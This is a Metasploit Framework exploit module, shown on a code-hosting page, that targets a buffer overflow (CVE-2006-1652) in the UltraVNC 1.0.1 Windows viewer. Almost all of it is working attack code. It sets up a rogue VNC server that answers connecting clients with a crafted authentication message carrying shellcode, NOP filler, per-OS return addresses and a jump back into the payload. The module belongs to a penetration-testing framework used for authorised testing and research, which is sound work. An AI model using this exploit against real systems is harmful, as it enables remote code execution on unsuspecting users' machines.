Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/vnc/ultravnc_client.rb
19513 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Exploit::Remote
7
Rank = NormalRanking
8
9
include Msf::Exploit::Remote::TcpServer
10
11
def initialize(info = {})
12
super(
13
update_info(
14
info,
15
'Name' => 'UltraVNC 1.0.1 Client Buffer Overflow',
16
'Description' => %q{
17
This module exploits a buffer overflow in UltraVNC Win32
18
Viewer 1.0.1 Release.
19
},
20
'Author' => 'MC',
21
'License' => MSF_LICENSE,
22
'References' => [
23
[ 'CVE', '2006-1652' ],
24
[ 'OSVDB', '24456' ],
25
[ 'BID', '17378' ],
26
],
27
'DefaultOptions' => {
28
'EXITFUNC' => 'thread',
29
},
30
'Payload' => {
31
'Space' => 500,
32
'BadChars' => "\x00",
33
'MaxNops' => 0,
34
'StackAdjustment' => -3500,
35
},
36
'Platform' => 'win',
37
'Targets' => [
38
[ 'Windows 2000 SP4 English', { 'Ret' => 0x7c2ec68b } ],
39
[ 'Windows XP SP2 English', { 'Ret' => 0x77dc15c0 } ],
40
[ 'Windows 2003 SP1 English', { 'Ret' => 0x76aa679b } ],
41
],
42
'Privileged' => false,
43
'DisclosureDate' => '2006-04-04',
44
'DefaultTarget' => 0,
45
'Notes' => {
46
'Reliability' => UNKNOWN_RELIABILITY,
47
'Stability' => UNKNOWN_STABILITY,
48
'SideEffects' => UNKNOWN_SIDE_EFFECTS
49
}
50
)
51
)
52
53
register_options(
54
[
55
OptPort.new('SRVPORT', [ true, "The VNCServer daemon port to listen on", 5900 ])
56
]
57
)
58
end
59
60
def on_client_connect(client)
61
rfb = "RFB 003.006\n"
62
63
client.put(rfb)
64
end
65
66
def on_client_data(client)
67
return if ((p = regenerate_payload(client)) == nil)
68
69
filler = make_nops(980 - payload.encoded.length)
70
71
sploit = "\x00\x00\x00\x00\x00\x00\x04\x06" + "Requires Ultr@VNC Authentication\n"
72
sploit << payload.encoded + filler + [target.ret].pack('V')
73
sploit << "PASSWORD" + [0xe8, -997].pack('CV')
74
75
print_status("Sending #{sploit.length} bytes to #{client.getpeername}:#{client.peerport}...")
76
client.put(sploit)
77
78
handler
79
service.close_client(client)
80
end
81
end
82
83